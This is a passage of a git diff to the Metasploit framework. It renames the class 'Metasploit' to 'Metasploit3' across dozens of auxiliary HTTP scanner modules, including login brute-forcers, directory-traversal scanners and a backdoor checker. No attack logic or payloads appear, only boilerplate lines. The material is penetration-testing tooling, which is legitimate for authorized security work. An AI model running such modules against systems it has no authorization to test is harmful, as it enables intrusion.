< Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb index 290d82d5f5..8fa9b4f428 100644 --- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb +++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index 289578f709..55d0033399 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb index 196a3ebda8..de6c042743 100644 --- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb index 6bcc50a9e3..cf49d589a8 100644 --- a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb +++ b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb index 54a87a741b..7f16552941 100644 --- a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb +++ b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index f940b9c256..1f8fc7fd14 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb index 46f74cd374..166a48eba2 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index c44fcd0186..3878ced5cd 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index bd6cd325ec..c7517d32f1 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/coldfusion_version.rb b/modules/auxiliary/scanner/http/coldfusion_version.rb index 1d1079dcda..b27972d810 100644 --- a/modules/auxiliary/scanner/http/coldfusion_version.rb +++ b/modules/auxiliary/scanner/http/coldfusion_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/copy_of_file.rb b/modules/auxiliary/scanner/http/copy_of_file.rb index e35a16474a..27d2ea545c 100644 --- a/modules/auxiliary/scanner/http/copy_of_file.rb +++ b/modules/auxiliary/scanner/http/copy_of_file.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index 058b6bfc5c..ac9ac083f0 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::HttpCrawler diff --git a/modules/auxiliary/scanner/http/dell_idrac.rb b/modules/auxiliary/scanner/http/dell_idrac.rb index 01f40c37fc..0bbc7ecf82 100644 --- a/modules/auxiliary/scanner/http/dell_idrac.rb +++ b/modules/auxiliary/scanner/http/dell_idrac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/dir_listing.rb b/modules/auxiliary/scanner/http/dir_listing.rb index 6a3364ed82..b759eb9fc3 100644 --- a/modules/auxiliary/scanner/http/dir_listing.rb +++ b/modules/auxiliary/scanner/http/dir_listing.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/dir_scanner.rb b/modules/auxiliary/scanner/http/dir_scanner.rb index 3f24bedb35..4c2263dba7 100644 --- a/modules/auxiliary/scanner/http/dir_scanner.rb +++ b/modules/auxiliary/scanner/http/dir_scanner.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'thread' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb index 448fd32a6c..36f44b069b 100644 --- a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb index 494e19292b..a64f3b8a87 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb index e210ebbe31..8816247bf2 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb index f20c457475..f2e2ad293a 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb b/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb index 4ed4ced014..ebf3838a7b 100644 --- a/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb +++ b/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb index 18965553cb..a121331058 100644 --- a/modules/auxiliary/scanner/http/dolibarr_login.rb +++ b/modules/auxiliary/scanner/http/dolibarr_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb index 6e8f2ee1aa..04d650de51 100644 --- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb +++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/ektron_cms400net.rb b/modules/auxiliary/scanner/http/ektron_cms400net.rb index acba661af1..77ff86171e 100644 --- a/modules/auxiliary/scanner/http/ektron_cms400net.rb +++ b/modules/auxiliary/scanner/http/ektron_cms400net.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb index 05af0bcb44..58be3c1b0c 100644 --- a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb +++ b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'json' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index c28dc009c7..d15f58d6b0 100644 --- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/http' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index 8bc9edf5b9..fd0a168ace 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery diff --git a/modules/auxiliary/scanner/http/etherpad_duo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb index 8e8bdd68db..eccfdbc20d 100644 --- a/modules/auxiliary/scanner/http/etherpad_duo_login.rb +++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb b/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb index 3ecffe7521..dade96bb4f 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb index 57f513e37f..3bb9ab7c3b 100644 --- a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb +++ b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/file_same_name_dir.rb b/modules/auxiliary/scanner/http/file_same_name_dir.rb index b406397f96..b203939b13 100644 --- a/modules/auxiliary/scanner/http/file_same_name_dir.rb +++ b/modules/auxiliary/scanner/http/file_same_name_dir.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/files_dir.rb b/modules/auxiliary/scanner/http/files_dir.rb index 175032314a..ffd2f92819 100644 --- a/modules/auxiliary/scanner/http/files_dir.rb +++ b/modules/auxiliary/scanner/http/files_dir.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb index a5eeda976c..a690c8e661 100644 --- a/modules/auxiliary/scanner/http/frontpage_login.rb +++ b/modules/auxiliary/scanner/http/frontpage_login.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/http/git_scanner.rb b/modules/auxiliary/scanner/http/git_scanner.rb index 04d97af1e8..ee027272ff 100644 --- a/modules/auxiliary/scanner/http/git_scanner.rb +++ b/modules/auxiliary/scanner/http/git_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/gitlab_login.rb b/modules/auxiliary/scanner/http/gitlab_login.rb index 397749b25f..46df091403 100644 --- a/modules/auxiliary/scanner/http/gitlab_login.rb +++ b/modules/auxiliary/scanner/http/gitlab_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/gitlab' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/gitlab_user_enum.rb b/modules/auxiliary/scanner/http/gitlab_user_enum.rb index 4655decabc..e090a1e07c 100644 --- a/modules/auxiliary/scanner/http/gitlab_user_enum.rb +++ b/modules/auxiliary/scanner/http/gitlab_user_enum.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'json' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index 47a0d04383..ee0000161b 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/glassfish' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/goahead_traversal.rb b/modules/auxiliary/scanner/http/goahead_traversal.rb index d7f777cb4c..2fa77e2376 100644 --- a/modules/auxiliary/scanner/http/goahead_traversal.rb +++ b/modules/auxiliary/scanner/http/goahead_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb index 1c919d46ea..2fde2d1901 100644 --- a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb +++ b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb index d235261e9e..3339ef4e3b 100644 --- a/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb index a7319af55e..1acddfa9d5 100644 --- a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb index 9332e18aec..bb3859b313 100644 --- a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb index 48edd572ab..81f4519f49 100644 --- a/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb index 56085ccd87..c4dbf3e12f 100644 --- a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb +++ b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb index d022514b57..20cceac73b 100644 --- a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb +++ b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/smh' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/http_header.rb b/modules/auxiliary/scanner/http/http_header.rb index 4fb02c0185..0fe42d2b52 100644 --- a/modules/auxiliary/scanner/http/http_header.rb +++ b/modules/auxiliary/scanner/http/http_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/http_hsts.rb b/modules/auxiliary/scanner/http/http_hsts.rb index 6820415d23..06b6126bad 100644 --- a/modules/auxiliary/scanner/http/http_hsts.rb +++ b/modules/auxiliary/scanner/http/http_hsts.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 58b83f281c..de43931a43 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -10,7 +10,7 @@ require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/http' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index 9c98351055..51774421c0 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/http_version.rb b/modules/auxiliary/scanner/http/http_version.rb index 826f3589d9..10ac45f37a 100644 --- a/modules/auxiliary/scanner/http/http_version.rb +++ b/modules/auxiliary/scanner/http/http_version.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/httpbl_lookup.rb b/modules/auxiliary/scanner/http/httpbl_lookup.rb index 43efcba534..3fdc6c3755 100644 --- a/modules/auxiliary/scanner/http/httpbl_lookup.rb +++ b/modules/auxiliary/scanner/http/httpbl_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require "net/dns/resolver" -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/iis_internal_ip.rb b/modules/auxiliary/scanner/http/iis_internal_ip.rb index 7c370e3682..ab597f3bc7 100644 --- a/modules/auxiliary/scanner/http/iis_internal_ip.rb +++ b/modules/auxiliary/scanner/http/iis_internal_ip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/influxdb_enum.rb b/modules/auxiliary/scanner/http/influxdb_enum.rb index 5de58a71c0..a4b17dcea8 100644 --- a/modules/auxiliary/scanner/http/influxdb_enum.rb +++ b/modules/auxiliary/scanner/http/influxdb_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/infovista_enum.rb b/modules/auxiliary/scanner/http/infovista_enum.rb index 99873f6276..293613c0c2 100644 --- a/modules/auxiliary/scanner/http/infovista_enum.rb +++ b/modules/auxiliary/scanner/http/infovista_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/ipboard_login.rb b/modules/auxiliary/scanner/http/ipboard_login.rb index 31c207f6ed..2e32e763ef 100644 --- a/modules/auxiliary/scanner/http/ipboard_login.rb +++ b/modules/auxiliary/scanner/http/ipboard_login.rb @@ -3,7 +3,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/ipboard' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jboss_status.rb b/modules/auxiliary/scanner/http/jboss_status.rb index cae4efc341..871adfedaa 100644 --- a/modules/auxiliary/scanner/http/jboss_status.rb +++ b/modules/auxiliary/scanner/http/jboss_status.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jboss_vulnscan.rb b/modules/auxiliary/scanner/http/jboss_vulnscan.rb index 0d0f83991b..7c6e5758ab 100644 --- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb +++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jenkins_command.rb b/modules/auxiliary/scanner/http/jenkins_command.rb index 8882bd2bef..87c640e6be 100644 --- a/modules/auxiliary/scanner/http/jenkins_command.rb +++ b/modules/auxiliary/scanner/http/jenkins_command.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'cgi' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index be1e7c14ad..88db19fbe7 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb @@ -11,7 +11,7 @@ require 'rex/proto/http' require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/jenkins_login.rb b/modules/auxiliary/scanner/http/jenkins_login.rb index 0ec24a6ad9..66bd139aa9 100644 --- a/modules/auxiliary/scanner/http/jenkins_login.rb +++ b/modules/auxiliary/scanner/http/jenkins_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/jenkins' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb index 660ea8a482..0b355c0e4f 100644 --- a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb +++ 